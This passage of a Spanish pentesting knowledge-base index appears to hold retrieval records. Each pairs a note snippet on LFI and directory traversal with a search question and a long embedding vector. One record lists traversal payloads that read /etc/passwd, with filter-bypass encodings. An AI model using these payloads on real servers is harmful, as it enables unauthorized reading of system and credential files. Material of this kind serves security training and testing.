0.04433, -0.04821, -0.0909, -0.0543, 0.04379, -0.00966, -0.06083, -0.0078, -0.00801, -0.02438, -0.03555, 0.02547, 0.01018, -0.0194, -0.0045, -0.02255, -0.01729, 0.05451, 0.02694]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "con que puedo analizar credenciales ocultas en base64?", "v": [0.11864, 0.02183, -0.17707, 0.02511, -0.02892, -0.09593, -0.0055, -0.05402, -0.07291, -0.09792, 0.0048, 0.06865, -0.05865, -0.01597, 0.02977, 0.00652, -0.00367, -0.0678, -0.08685, -0.04826, -0.00576, -0.14559, -0.06203, -0.08331, -0.00981, 0.0105, -0.07918, -0.11332, 0.00769, -0.06033, 0.02307, 0.04598, -0.11638, 0.03029, -0.08505, 0.00553, -0.21121, -0.00936, -0.02862, 0.02015, 0.01858, 0.05948, -0.11329, 0.20847, 0.02543, -0.01026, -0.06176, 0.06241, 0.03864, -0.10175, -0.0566, -0.19204, -0.17671, -0.07601, -0.02659, -0.19581, 0.06187, -0.00262, 0.10317, 0.01088, -0.01122, 0.05427, 0.13417, 0.02177, 0.02648, -0.03209, 0.03409, 0.02034, -0.05992, 0.04567, -0.1065, 0.11216, -0.12605, 0.0307, 0.04649, 0.03278, 0.07287, -0.02144, 0.02645, 0.08256, -0.02177, 0.0486, -0.03547, 0.09649, -0.05775, -0.01504, -0.04079, -0.03953, -0.04393, -0.04398, 0.1313, 0.01083, -0.04419, 0.0442, -0.0296, 0.0065, 0.06485, -0.00285, -0.03161, 0.02893, -0.01821, -0.10043, -0.04534, 0.00895, 0.05741, 0.06724, 0.09146, -0.09363, -0.02789, 0.01751, -0.04587, 0.10559, -0.02415, -0.04658, 0.08846, -0.05069, -0.06361, 0.03143, 0.04854, -0.05689, -0.00488, 0.01221, -0.03646, -0.01019, 0.03791, -0.03495, -0.03148, 0.0035, -0.00217, -0.01034, -0.07655, -0.00209, -0.05104, 0.08551, -0.0743, 0.11688, -0.00538, -0.07809, -0.05264, -0.02414, 0.09869, 0.02507, -0.04545, -0.03392, 0.13705, 0.10375, 0.06203, -0.04883, -0.08568, -0.06992, 0.06608, 0.07053, 0.05483, 0.0175, -0.0237, 0.0263, 0.06197, -0.04229, -0.00114, 0.01257, -0.02625, 0.04654, -0.02598, 0.02348, -0.05213, -0.05262, 0.01416, -0.10669, -0.03377, 0.01303, -0.00991, 0.07599, -0.02935, -0.04987, -0.00286, -0.04858, -0.05125, -0.06825, 0.00103, -0.01863, 0.01825, 0.00213, 0.06915, -0.02522, 0.00239, -0.00169, -0.04027, -0.01099, -0.00069, -0.01616, 0.07831, -0.06095, -0.05622, 0.0274, -0.06159, -0.00729, 0.01931, 0.01295, 0.01961, -0.0935, -0.06234, 0.04304, -0.04703, -0.01181, -0.02167, 0.00934, 0.03944, 0.02973, -0.08099, 0.10742, 0.00259, -0.052, 0.02929, -0.07126, -0.04807, 0.01661, 0.05192, -0.03914, -0.01677, -0.03382, 0.05287, 0.01929, 0.02129, -0.05025, 0.01086, 0.05837, 0.00241, 0.04925, 0.07438, -0.01573, -0.0941, 0.02778, -0.09805, 0.01702, 0.00186, -0.038, -0.03269, 0.03502, -0.04431, -0.04696, 0.06923, 0.04343, -0.06204, -0.05496, -0.01242, -0.0689, -0.08908, 0.05672, 0.00189, -0.06189, -0.02338, 0.07859, 0.09053, -0.02711, 0.0171, -0.0295]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "cual es una alternativa libre a php://filter?", "v": [0.00841, 0.08346, 0.01715, 0.03431, -0.08377, -0.10068, -0.03031, -0.11104, -0.1506, -0.07453, -0.05322, -0.14781, -0.02945, 0.03491, 0.06965, -0.10992, 0.04341, -0.10306, 0.15315, -0.03662, -0.15155, -0.00077, -0.14894, -0.15815, -0.1039, -0.08797, -0.03537, 0.05306, -0.12613, -0.05132, 0.11089, -0.00198, 0.06267, 0.00521, -0.02696, 0.09453, 0.18665, 0.09378, 0.04863, -0.01856, -0.00988, -0.03784, -0.08235, 0.16208, -0.04939, -0.09066, -0.10637, -0.00915, 0.0227, 0.05735, -0.00998, -0.00823, -0.0355, 0.09132, 0.08466, -0.02544, 0.07174, -0.16283, -0.0236, 0.0277, -0.05235, 0.03149, 0.01039, -0.07506, 0.00795, 0.08054, -0.00836, -0.0157, -0.02564, 0.12312, 0.00232, -0.05367, -0.0073, -0.02056, -0.13349, 0.07743, -0.00531, -0.017, -0.0223, 0.02972, 0.02127, -0.09426, 0.01692, 0.01446, 0.00034, -0.08249, 0.08033, -0.06025, -0.02441, 0.03907, 0.03796, 0.03984, -0.00975, 0.1173, -0.04838, -0.10871, -0.03636, 0.10541, -0.0102, 0.03112, 0.06333, 0.01652, -0.07085, -0.04177, 0.09206, -0.10536, -0.00888, 0.07217, -0.10382, 0.05147, 0.01223, 0.05538, 0.02238, -0.00715, 0.00157, -0.02477, -0.04205, 0.06273, -0.00606, 0.01205, -0.03277, -0.0376, -0.08747, -0.13576, 0.11382, 0.07921, 0.14091, 0.01936, -0.08394, 0.05397, 0.06049, 0.04151, -0.07042, -0.10448, -0.13364, -0.0366, 0.12424, -0.02642, 0.0547, 0.02327, -0.05364, 0.0045, 0.03587, 0.02073, 0.03419, -0.05786, 0.01243, -0.04868, 0.00017, -0.05583, -0.07295, -0.00113, 0.00851, 0.09346, -0.05012, 0.05737, -0.00225, -0.02297, -0.07826, 0.08565, 0.08196, 0.01301, 0.03029, 0.02503, 0.01059, -0.0108, -0.00754, -0.05895, -0.09563, -0.06068, 0.00917, 0.03039, 0.07591, -0.03654, 0.01033, -0.06604, 0.02826, -0.12162, 0.02932, -0.01662, 0.1026, 0.05416, -0.09214, -0.02153, -0.02601, -0.0514, -0.00722, 0.00287, 0.01266, 0.00724, -0.01615, -0.01154, -0.09455, -0.06433, -0.00937, 0.04487, 0.03501, -0.11442, -0.03059, -0.02613, -0.08229, 0.01857, -0.00478, -0.00661, -0.03133, -0.07752, 0.03368, 0.01941, 0.03913, 0.00151, 0.04418, -0.00307, 0.06715, 0.00515, -0.06358, 0.00354, 0.02049, -0.01774, 0.03723, -0.00043, 0.03983, 0.02582, 0.00209, 0.01774, -0.02162, 0.05856, 0.00282, 0.01911, -0.04312, -0.02241, -0.00992, -0.0242, -0.02214, 0.02664, 0.00352, 0.00089, -0.00966, 0.0229, 0.01101, -0.03024, 0.05208, 0.02956, -0.01793, -0.01752, -0.01941, 0.02596, -0.08674, -0.04049, -0.04153, -0.00856, -0.05555, 0.02022, -0.03697, -0.00911, 0.02593, 0.01099]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "indexar": "que tecnica sirve para salir del directorio web y leer archivos?", "v": [0.02389, -0.13698, -0.14196, -0.19802, -0.01881, -0.17487, -0.017, -0.02167, 0.10917, 0.03181, -0.12861, -0.14038, 0.04253, -0.1841, 0.07581, -0.00485, 0.14438, -0.06896, 0.15679, -0.13355, -0.00722, 0.12812, -0.07608, -0.02035, -0.04679, -0.06669, 0.00143, -0.09234, -0.1619, 0.03852, -0.102, 0.09764, 0.13174, -0.03718, -0.04634, 0.11586, 0.05244, 0.02198, -0.11186, 0.16269, -0.07371, 0.01003, -0.07917, 0.05684, 0.01011, -0.06437, 0.12335, -0.04906, 0.03021, 0.00431, 0.04508, 0.0529, 0.05552, 0.06249, -0.1232, -0.00312, 0.09429, -0.0865, 0.03647, -0.06758, -0.09532, -0.00619, -0.03554, 0.0095, -0.03621, -0.03227, -0.02518, 0.01459, -0.09888, 0.02691, -0.04116, 0.11304, 0.10084, 0.06121, -0.09565, 0.01653, -0.02256, 0.04073, 0.00477, -0.05673, 0.10312, -0.00873, -0.06753, -0.02368, -0.09019, -0.08753, 0.01716, -0.02517, 0.0739, -0.11143, 0.08402, 0.10863, -0.11007, -0.08002, 0.01571, -0.03995, 0.02717, -0.01785, -0.00485, -0.06868, -0.00585, -0.047, -0.05576, 0.0707, 0.09237, 0.13087, 0.08382, 0.05251, -0.08332, 0.00699, 0.03701, 0.04054, 0.00787, -0.0012, -0.06421, 0.00946, -0.01964, -0.02694, -0.03024, -0.02733, 0.01373, -0.00579, -0.0127, 0.03835, -0.02964, -0.00099, 0.0905, 0.02739, -0.01579, 0.00525, 0.0333, -0.04698, -0.11034, 0.06737, -0.06404, 0.01593, 0.10351, 0.04377, -0.07738, -0.02275, 0.10464, 0.03754, -0.08467, 0.01717, 0.00945, -0.05611, 0.06612, -0.07357, -0.05319, -0.15623, -0.05988, -0.00554, -0.0111, -0.03019, -0.01867, -0.04888, 0.05147, -0.09691, -0.01023, 0.02139, -0.04117, 0.06665, -0.03223, 0.02708, -0.07949, -0.03959, -0.06046, 0.02855, 0.04987, -0.02005, 0.0428, 0.03962, -0.04176, -0.05803, 0.01184, 0.02717, -0.02184, -0.05097, 0.00654, -0.01102, -0.00479, -0.07372, 0.02619, 0.04328, -0.03786, -0.00642, 0.07302, -0.03649, -0.0277, 0.03947, -0.01943, 0.0129, -0.08992, -0.00153, -0.02624, -0.02955, -0.0442, 0.02429, 0.03463, -0.02337, -0.00737, 0.01627, -0.00399, 0.00657, 0.00881, 0.01586, 0.02402, -0.06193, -0.02955, -0.03161, 0.01472, 0.00051, 0.07028, -0.05191, -0.00081, -0.01976, 0.023, 0.02423, -0.0049, 0.00984, 0.02644, -0.02672, 0.02687, -0.00199, 0.03054, 0.02105, -0.01175, -0.05886, -0.01579, 0.01457, -0.05505, -0.00288, 0.01627, 0.02044, 0.00615, 0.01311, -0.01059, 0.04361, -0.06242, -0.01791, -0.02686, 0.06484, -0.03536, 0.00335, -0.03051, -0.06171, -0.05964, -0.00311, 0.00328, -0.02097, -0.02692, -0.01951, -0.00425, 0.03932, -0.00303, -0.00465]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "indexar": "como puedo hacer un salto de directorio para acceder a ficheros arbitrarios?", "v": [-0.02775, -0.0871, -0.27891, -0.12722, 0.03669, -0.03958, 0.03883, -0.0262, -0.2281, -0.0012, 0.06529, -0.12752, -0.06562, -0.09326, 0.13546, -0.12387, 0.08877, 0.0967, -0.02747, -0.08918, 0.10807, 0.01252, -0.01073, 0.02342, -0.03398, -0.08788, -0.00778, 0.10602, -0.11019, -0.05307, 0.05379, 0.10611, 0.11551, -0.021, 0.06221, -0.07295, 0.03375, -0.01074, -0.03776, 0.0766, 0.00542, 0.07739, -0.06739, -0.05851, -0.07605, -0.10311, 0.03951, 0.05336, 0.06714, 0.0102, 0.15887, -0.10445, 0.0757, -0.09954, -0.10992, 0.01281, 0.18645, 0.00882, -0.0277, -0.04211, -0.07371, -0.08028, 0.03933, 0.1348, -0.09459, 0.04315, 0.03721, -0.03135, -0.03814, 0.01354, -0.06845, 0.01781, -0.02096, 0.07085, -0.06519, 0.02366, -0.02924, -0.07207, 0.01665, 0.02002, -0.08249, -0.03662, 0.02462, -0.07765, -0.0876, -0.11454, 0.0294, -0.04272, 0.02975, -0.09307, 0.08308, -0.02799, -0.04462, -0.10069, -0.04488, -0.01234, 0.00362, -0.03922, -0.00765, -0.05785, -0.02706, 0.0427, -0.04768, 0.13082, 0.02016, 0.04322, 0.01979, 0.02568, -0.04302, -0.05797, -0.01008, 0.08572, -0.04186, -0.05311, 0.0446, -0.01187, -0.04859, -0.00189, -0.00581, 0.05444, 0.01323, -0.11985, -0.03618, -0.00744, 0.02401, -0.06511, 0.05797, 0.07929, -0.04964, 0.13583, -0.00473, 0.06454, -0.14422, -0.05466, 0.0246, -0.05946, 0.01878, 0.01992, 0.08043, 0.00664, -0.01036, 0.0105, -0.0211, -0.02783, -0.07172, -0.03758, -0.06028, -0.02856, -0.05124, -0.08538, 0.0636, -0.0229, -0.12705, 0.00385, 0.05266, -0.05128, 0.05615, -0.04294, -0.02209, 0.06893, 0.00834, 0.03524, 0.02236, 0.05872, -0.05127, 0.01557, -0.00463, -0.04462, 0.01621, 0.05737, -0.13184, 0.03645, -0.03456, -0.0453, 0.1127, -0.01579, -0.04346, -0.02052, 0.03365, 0.01567, -0.00262, -0.00751, 0.00816, -0.00391, -0.05799, -0.05264, 0.0116, 0.01454, 0.0466, 0.09381, -0.00224, 0.0154, -0.03466, -0.07566, -0.05245, 0.01122, -0.01854, -0.01379, -0.07188, 0.02249, 0.0337, -0.00498, 0.00188, -0.01709, 0.0497, -0.01036, 0.01357, 0.02728, 0.00396, -0.03941, 0.03312, 0.03027, 0.12256, -0.0138, -0.03194, 0.0217, 0.00022, 0.03225, 0.00493, -0.12731, 0.00024, 0.01058, 0.06743, 0.01839, 0.01033, 0.03986, 0.04786, -0.02664, -0.05832, 0.02937, -0.04232, -0.04196, 0.04527, 0.0355, 0.01899, -0.0104, -0.05716, -0.02144, 0.00648, 0.00249, -0.03675, 0.04415, -0.01934, 0.0628, 0.00156, -0.02405, -0.01547, 0.05596, 0.03075, -0.05588, -0.00772, -0.00303, 0.01444, -0.00164, -0.03119, -0.00847]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "indexar": "cuales son los vectores de ataque para leer archivos fuera del directorio web?", "v": [0.07521, -0.0622, -0.04957, -0.08992, -0.11548, 0.04515, 0.11167, -0.04266, 0.11604, -0.06524, -0.03164, -0.17587, -0.11538, -0.10702, 0.15564, -0.01117, 0.15413, -0.08358, 0.1295, -0.09963, 0.01042, 0.03937, 0.02967, 0.04554, -0.06746, 0.07979, -0.03574, 0.10894, -0.0531, 0.00564, -0.07443, -0.03882, 0.13504, 0.00802, -0.06532, 0.03547, 0.00348, 0.04193, -0.06717, 0.19875, -0.00884, 0.04377, -0.20813, -0.01912, 0.00895, -0.10408, 0.02443, -0.05014, -0.00852, -0.09075, 0.03704, 0.10766, -0.05079, 0.06247, -0.03884, -0.03723, 0.0705, -0.03108, 0.06735, 0.02345, -0.14068, 0.09091, -0.0617, -0.08396, -0.05093, -0.01816, -0.06058, 0.00951, -0.14764, -0.0093, 0.00301, 0.06262, 0.08385, 0.0548, 0.01089, 0.07884, 0.04208, 0.06209, -0.0528, -0.01061, 0.03896, -0.07227, -0.05897, 0.00164, -0.07235, -0.00407, 0.02011, -0.03535, 0.01779, -0.09332, 0.05873, 0.03298, -0.12474, -0.07746, -0.08423, -0.06564, 0.00218, -0.11212, 0.04293, -0.04349, -0.07103, -0.04527, -0.11892, 0.07576, 0.12901, 0.08721, -0.02276, 0.03598, -0.06402, -0.06321, 0.02882, -0.09145, -0.01093, -0.05754, -0.01048, -0.06405, -0.06235, 0.02919, 0.04332, -0.04294, -0.08195, -0.00281, -0.05316, 0.09718, -0.0668, 0.0229, 0.01882, -0.00883, -0.031, 0.02507, 0.02539, -0.00751, -0.07492, -0.04446, -0.10731, 0.04406, 0.02733, -0.02391, -0.02593, -0.04069, 0.07527, 0.02583, 0.02802, 0.00025, 0.03941, -0.03515, 0.01193, -0.06837, -0.12547, -0.05781, -0.04475, 0.03633, 0.03535, 0.01388, -0.06985, 8e-05, -0.00334, -0.05169, -0.00114, 0.0637, -0.01263, 0.08217, -0.08976, 0.07722, -0.02665, -0.07536, -0.02954, 0.00059, 0.10778, 0.01144, 0.0168, 0.04943, -0.05535, -0.05286, -0.01735, -0.04676, -0.07462, -0.10852, 0.09951, 0.01015, 0.02882, -0.03424, -0.04028, 0.04511, -0.08242, -0.01513, 0.11932, -0.00036, 0.02074, 0.05363, 0.00163, 0.05646, -0.07226, -0.00887, 0.00126, -0.08513, -0.07579, 0.06464, 0.01118, -0.02117, -0.00231, 0.0004, -0.02492, -0.01912, 0.02157, 0.0701, -0.04391, -0.04581, -0.02687, 0.02594, 0.04218, -0.01223, 0.11521, -0.04612, -0.01008, -0.00712, 0.02108, -0.01459, 0.01449, 0.01281, 0.0431, 0.01527, 0.01439, 0.02295, -0.00022, -0.02608, -0.02469, -0.04386, 0.00716, 0.04102, -0.07682, -0.02616, 0.03619, -0.05009, 0.02821, 0.01501, 0.01208, 0.0288, -0.06114, 0.00886, 0.00697, 0.05267, -0.05098, 0.00169, -0.05055, -0.08611, -0.07871, 0.03595, -0.01818, -0.02298, -0.02956, 0.05744, 0.03235, -0.00292, 0.04127, -0.02075]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "cuΓ‘l es la sintaxis correcta para especificar un archivo en la URL?", "v": [0.06549, -0.06052, -0.03676, 0.06271, 0.17836, -0.25905, -0.03236, -0.15891, -0.09758, 0.09089, -0.07498, -0.17371, -0.01839, 0.00361, 0.07279, -0.05445, 0.07912, -0.00296, 0.04542, -0.10812, 0.0052, -0.08737, -0.05163, 0.00545, -0.1235, -0.06506, -0.02466, 0.04316, -0.07096, 0.0175, 0.00391, 0.08672, 0.09406, 0.03945, -0.04382, 0.16218, -0.04313, -0.00863, -0.04838, 0.00836, -0.00963, 0.12351, -0.09045, -0.00725, -0.07372, -0.08869, 0.09847, 0.05974, 0.03243, -0.10393, 0.0501, -0.05964, -0.1063, -0.01208, -0.03818, -0.12331, 0.05058, -0.18812, 0.05721, -0.00071, 0.09229, 0.02937, -0.07916, 0.05662, -0.09951, -0.05875, -0.03778, -0.0073, -0.07084, -0.07424, -0.00645, 0.07678, 0.0302, 0.0403, 0.06975, 0.00094, -0.06123, -0.0783, 0.02975, 0.10035, 0.07875, 0.00672, -0.08827, -0.03844, -0.08291, -0.02728, -0.04046, -0.01599, 0.01895, -0.09925, 0.07972, 0.02874, -0.0372, -0.03429, 0.02923, -0.13099, -0.02834, 0.0627, -0.04204, 0.00193, 0.09741, 0.01383, -0.0123, 0.07612, 0.07785, -0.00108, 0.01673, 0.02986, -0.03752, -0.04231, 0.04708, -0.02829, -0.00661, 0.01152, -0.03765, -0.05133, 0.00138, 0.01948, -0.03979, -0.07648, 0.02773, -0.0255, 0.02493, 0.04153, -0.07229, 0.04461, -0.00113, 0.11886, -0.01985, 0.01325, -0.06304, -0.01761, -0.04258, 0.00977, -0.07403, 0.08265, 0.14088, 0.09048, -0.05338, -0.0176, 0.0231, -0.04989, -0.01385, 0.09074, 0.04213, 0.05168, -0.02738, 0.03644, -0.0725, -0.04503, -0.05306, -0.03042, 0.0901, -0.06958, -0.04142, 0.006, 0.02068, -0.07743, -0.04913, -0.05203, 0.00582, 0.04535, -0.05726, -0.081, 0.09109, -0.05911, -0.03704, 0.01637, 0.03163, -0.09421, 0.05939, -0.0258, -0.01513, -0.08868, -0.02465, -0.05815, -0.05395, -0.09278, 0.08123, 0.02145, -0.01282, -0.08364, -0.00991, 0.0102, 0.00121, -0.05893, 0.09702, 0.01958, -0.07187, 0.0885, -0.02276, -0.06859, 0.00809, -0.00999, 0.05479, -0.0561, -0.01994, -0.04067, -0.06216, 0.03214, -0.00268, -0.11179, 0.01572, -0.03406, 0.07493, 0.00453, -0.05213, -0.06161, -0.04336, -0.02131, 0.02202, 0.02707, 0.02774, -0.05422, -0.02444, 0.01214, 0.05121, 0.04459, -0.00363, 0.03764, -0.0697, 0.02335, 0.06128, -0.0658, -0.0089, 0.03026, 0.03566, 0.01129, -0.0757, -0.03216, -0.06755, 0.06626, -0.02204, 0.02972, 0.04586, 0.03441, 0.03297, 0.02621, 0.00134, -0.03355, 0.05581, 0.05964, -0.0649, -0.06546, -0.03276, 0.01949, -0.03935, 0.05669, 0.03359, -0.04219, -0.03186, -0.03217, 0.01111, -0.00286, 0.07722, -0.01504]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "cΓ³mo puedo indicar que quiero descargar un documento especΓ­fico con parΓ‘metros?", "v": [-0.15428, 0.26642, -0.11846, -0.13748, 0.10729, -0.07123, 0.13124, -0.09731, -0.24192, -0.05858, -0.04666, -0.01791, 0.00346, -0.19299, 0.04929, 0.05188, 0.15148, -0.02017, 0.01975, 0.00291, 0.08035, -0.18715, -0.10054, -0.03523, -0.12916, -0.00929, -0.0564, 0.0205, -0.12647, -0.06735, -0.00472, 0.05466, 0.01275, -0.07448, -0.08531, 0.08395, -0.00841, 0.04038, -0.08022, -0.00119, 0.01517, -0.00917, -0.10418, 0.12893, 0.00858, -0.02084, -0.01379, 0.07114, -0.02362, -0.0751, 0.0588, 0.01711, -0.05024, 0.01847, -0.13909, -0.07749, 0.17758, -0.04854, 0.09474, -0.07772, 0.05591, 0.00829, -0.00302, 0.07355, 0.00426, 0.04072, 0.03195, 0.04689, 0.0051, -0.03146, -0.02863, 0.05976, 0.02626, -0.0698, 0.07452, 0.0951, -0.04741, -0.04241, 0.02927, 0.02649, 0.08649, 0.00195, -0.0544, 0.01227, -0.06457, -0.05454, 0.02354, -0.01904, 0.09882, -0.1213, 0.05537, -0.01703, -0.01254, -0.03924, -0.02641, -0.01674, -0.01141, 0.11487, 0.01299, 0.05586, -0.00293, -0.02769, -0.00495, 0.09771, 0.03155, 0.00101, -0.01121, -0.05278, -0.0288, 0.0299, -0.0217, -0.00467, 0.03352, -0.01987, 0.01197, -0.04313, -0.02466, -0.02039, -0.039, -0.09883, -0.0722, 0.02999, -0.0386, 0.01053, 0.07646, -0.09531, -0.03643, 0.05268, 0.00638, 0.05672, -0.0331, 0.05163, -0.05015, -0.01603, -0.06293, 0.06315, -0.04497, -0.03256, -0.05051, -0.06465, 0.02543, -0.07602, -0.01369, 0.02419, 0.04498, -0.0434, -0.02775, -0.03244, -0.08255, -0.02957, 0.02535, -0.00737, 0.00689, 0.02377, -0.04727, 0.00471, 0.09421, -0.04122, -0.03136, -0.01692, 0.00974, 0.03536, -0.04118, -0.02762, 0.05157, 0.01099, -0.02851, -0.0413, 0.02951, 0.05743, 0.00293, 0.0124, -0.01479, -0.09684, 0.05785, -0.04993, -0.0368, -0.02207, 0.00927, -0.00536, -0.08265, 0.07531, -0.00257, -0.023, -0.05087, -0.0345, 0.03031, -0.03892, 0.00312, 0.03131, -0.00539, 0.08442, 0.0105, 0.01506, -0.00035, -0.04931, -0.06712, 0.02108, -0.02343, -0.04429, -0.06369, -0.07129, 0.00873, -0.05137, 0.10237, 0.00114, -0.05609, 0.01136, -0.02797, 0.01047, 0.01633, -0.04124, 0.0695, -0.03345, -0.08892, 0.01395, 0.08002, 0.03591, 0.02547, 0.01323, -0.0206, 0.04721, 0.14955, -0.01247, 0.02616, -0.02816, 0.04563, 0.02209, 0.00698, 0.06839, -0.00357, 0.06309, -0.0497, -0.02308, 0.08063, 0.05635, 0.01466, -0.0389, -0.06548, -0.0201, 0.07522, 0.09597, -0.0346, -0.04376, -0.05215, -0.03663, -0.04532, 0.01669, 0.03518, -0.06428, -0.01342, 0.01074, 0.05937, -0.04798, 0.00021, -0.08607]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "quΓ© opciΓ³n debo usar para seleccionar una pΓ‘gina concreta de navegaciΓ³n?", "v": [-0.00606, 0.09018, -0.27548, -0.06581, 0.06259, -0.10228, -0.02861, -0.10881, -0.08027, -0.13943, -0.0709, -0.20401, -0.01573, -0.05704, -0.09186, -0.08365, 0.11373, -0.06042, 0.02962, -0.01354, -0.00117, -0.09113, -0.08401, 0.03578, -0.08224, -0.01926, -0.00689, -0.08343, -0.11907, 0.0126, -0.01349, 0.03351, 0.07396, -0.04436, -0.02514, 0.00056, 0.0407, -0.0101, 0.01616, -0.01926, 0.00743, 0.00563, -0.10647, 0.10408, -0.00671, 0.05225, -0.0451, 0.01191, -0.16697, 0.03421, 0.13809, 0.00101, -0.11384, 0.06428, -0.05925, 0.02812, 0.1469, -0.03227, 0.03274, -0.12618, 0.05784, 0.04204, 0.0158, 0.08626, 0.01451, -0.0494, -0.03039, -0.05657, 0.01355, 0.01425, -0.03984, -0.0088, 0.04367, 0.04533, 0.05897, 0.02974, 0.11458, 0.07951, 0.12693, -0.00551, 0.03446, -0.07521, -0.08736, -0.06308, -0.11327, -0.08961, -0.04711, 0.0349, -0.02206, -0.12916, 0.04626, -0.00704, 0.00115, -0.01753, -0.04724, -0.11726, -0.06184, 0.07405, 0.02146, 0.07269, 0.11856, -0.00807, 0.01927, 0.11324, 0.04337, 0.0002, 0.03533, -0.03856, -0.06404, -0.04122, 0.05759, 0.01177, -0.02913, -0.15931, -0.09423, -0.00929, -0.05977, -0.02007, -0.0318, -0.01302, -0.12004, -0.05218, -0.02696, -0.09736, 0.05859, 0.09328, -0.00389, 0.00157, -0.07582, 0.00866, -0.04, -0.02134, -0.02465, 0.00165, -0.01432, -0.0285, 0.04571, -0.02736, 0.0495, 0.00467, 0.05313, -0.04849, -0.14795, -0.0562, 0.02136, -0.05881, 0.02506, 0.02115, -0.06046, 0.01421, 0.03732, -0.03536, -0.01057, 0.04735, -0.01463, 0.01597, 0.00323, -0.02851, -0.05599, -0.0146, -0.00054, -0.02795, -0.02386, 0.10569, 0.02234, -0.10053, -0.04677, -0.04688, 0.03089, 0.01075, 0.05024, 0.11462, -0.06481, -0.10986, -0.07961, -0.08299, -0.08125, 0.02952, -0.01331, 0.0308, 0.00243, 0.02395, 0.03107, 0.01318, -0.01079, -0.01526, -0.0499, 0.00958, -0.04884, 0.03555, 0.00757, 0.04712, -0.01695, 0.03874, 0.01208, 0.03213, -0.03637, -0.00194, 0.03374, -0.0689, -0.05404, -0.01627, -0.01196, -0.03147, 0.06649, 0.02128, -0.04772, -0.00583, 0.00057, -0.0147, 0.02593, -0.05531, 0.07982, -0.02089, -0.03403, 0.02252, 0.06525, -0.03667, 0.02616, 0.00851, 0.03219, 0.03969, -0.002, 0.00413, 0.04589, 0.0583, 0.09295, -0.05433, -0.01128, 0.05854, 0.02397, 0.01788, -0.1078, -0.02943, -0.01256, 0.00351, 0.05822, 0.02519, -0.08661, -0.00024, 0.02704, 0.10438, -0.0694, -0.01412, -0.00216, -0.06134, -0.12725, 0.08909, -0.03757, -0.0389, -0.0642, -0.00959, 0.02188, -0.05211, 0.04562, -0.00148]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "que tecnica sirve para acceder al archivo etc/passwd sin que el servidor la bloquee?", "v": [0.01517, -0.04985, -0.22315, -0.18616, -0.06825, -0.14106, 0.05345, -0.08215, 0.0252, -0.01386, -0.12097, -0.11198, 0.01999, -0.01469, 0.0819, -0.02912, 0.12014, -0.16493, 0.09763, -0.0219, 0.05551, 0.03241, 0.08796, 0.02188, -0.06381, -0.03821, -0.00113, -0.04281, -0.21468, -0.09864, -0.00556, -0.05161, 0.06132, -0.01606, 0.08292, 0.00045, 0.02417, 0.11765, -0.06357, 0.09159, -0.02286, -0.07384, -0.10455, 0.06152, -0.03783, -0.0836, 0.15247, 0.10364, 0.13787, 0.0595, -0.03144, -0.06791, -0.12832, -0.01367, -0.03623, -0.03681, 0.17252, -0.08049, -0.00816, 0.0943, -0.15495, 0.03921, 0.01163, -0.05113, 0.03379, -0.01179, 0.03571, -0.03857, -0.04158, -0.01802, -0.10296, 0.05775, 0.0617, -0.06147, -0.00952, 0.01686, -0.09587, 0.00552, -0.01894, 0.05087, 0.00714, 